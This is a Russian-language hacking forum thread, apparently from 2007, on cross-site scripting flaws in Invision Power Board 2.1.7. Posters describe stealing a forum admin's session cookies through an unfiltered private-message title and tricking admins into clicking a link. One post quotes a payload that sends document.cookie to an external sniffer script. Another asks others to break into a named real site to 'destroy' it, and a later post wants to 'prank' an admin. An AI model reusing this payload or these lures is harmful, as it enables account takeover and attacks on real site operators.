![]() |
|
| ГЛАВНАЯ | ФОРУМ | НОВОСТИ | СТАТЬИ | РЕЛИЗЫ | E-BOOKS | СКАЧАТЬ | WEB-TOOLS | СНИФФЕР | ЮЗЕРБАРЫ | О НАС | |
|
|
|
|||||||
| Регистрация | Доска почета | Справка | Пользователи | Календарь | Поиск | Сообщения за день | Все разделы прочитаны |
![]() |
|
|
Опции темы | Поиск в этой теме | Опции просмотра |
|
|
#1 | |
|
новичок
|
Форум Invision Power Board v2.1.7 тоже не обошёлся без багов в инете появилась инфа что форум страдает XSS.
Лазая по сайтам я нашёл инфу что xss можно осуществить через приватные сообжения(не фильтруется вводимый заголовок) подсунув ядовитый линк админу форума и соснифав у него куки от админки. Вот сам скрипт который я свалял чтоб тырить куки (надо залить на хостинг). Цитата:
Скрипт был опробован и 100% рабочий. Лучьше совать не линк на скрипт а домашнюю страничку, так админы больше ведуться неожидая подвоха.
__________________
ICQ~ 366-135 |
|
|
|
|
|
|
#2 |
|
новичок
|
Еще не проверял
Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки изображений PDF файлов, содержащих HTML код. Если создать тему и прикрепить файл pdf а внутри него написать <script>alert()</script> то при открытие файла вылетает алерт... работает на ie Работает только при установленном acrobat reader <=7 Лечится обновлением Invision Power Board v2.1.7 (Debug) Remote Password Change Exploit PHP код:
4yB@K добавил 15.07.2007 в 20:53 Вот еще PHP код:
__________________
ищу хорошую девочку, которая умеет то же, что и плохая, только ХОРОШО 47-875-876
Последний раз редактировалось 4yB@K, 15.07.2007 в 22:35. |
|
|
|
|
|
#3 |
|
Гость
|
Может кто хочет попробывать взламать форум этой же версии на сайте www.mama.lt . Буду очень благодарен! :) Нужно их уничтожить.
|
|
|
|
#4 |
|
Гость
|
<input type="hidden" name="msg_title" value='"><script>document.location.href="http://путь до снифера /sniff.php?"+document.cookie;</script>'>
Что это строчка значет, и что такое снифер и с чем его едят? |
|
|
|
#5 |
|
познающий
|
Почитай здесь
http://kanick.ru/sniffer/ |
|
|
|
|
|
#6 | |
|
новичок
|
Цитата:
На этом сайте сниффер не работает, посмотри на моем.
__________________
ищу хорошую девочку, которая умеет то же, что и плохая, только ХОРОШО 47-875-876
|
|
|
|
|
|
|
#7 |
|
Гость
|
Ок, спасибо я только учусь, везде не трудно преуспеть....
Можно услышать объяснение строки: <form action="http://03-06.pp.ru/forum/index.php?act=msg" method="post" name="REPLIER""> |
|
|
|
#8 |
|
новичок
|
Хм, помоему тут введенные данные отправляются скрипту
http://03-06.pp.ru/forum/index.php?act=msg методом POST
__________________
ищу хорошую девочку, которая умеет то же, что и плохая, только ХОРОШО 47-875-876
|
|
|
|
|
|
#9 |
|
Гость
|
Хм, глянь страничку пож, посмотри и посоветуй если можно.... как оформить код на странице, и какая команда по замене 03-06.pp.ru/forum/index.php?act=msg
Хочузлобно подшутить над одним админишкой :) |
|
|
|
#10 |
|
новичок
|
Это хостинг Юкоз, так-что ничего тут не получится
__________________
ищу хорошую девочку, которая умеет то же, что и плохая, только ХОРОШО 47-875-876
|
|
|
|
![]() |
| Опции темы | Поиск в этой теме |
| Опции просмотра | |
|
|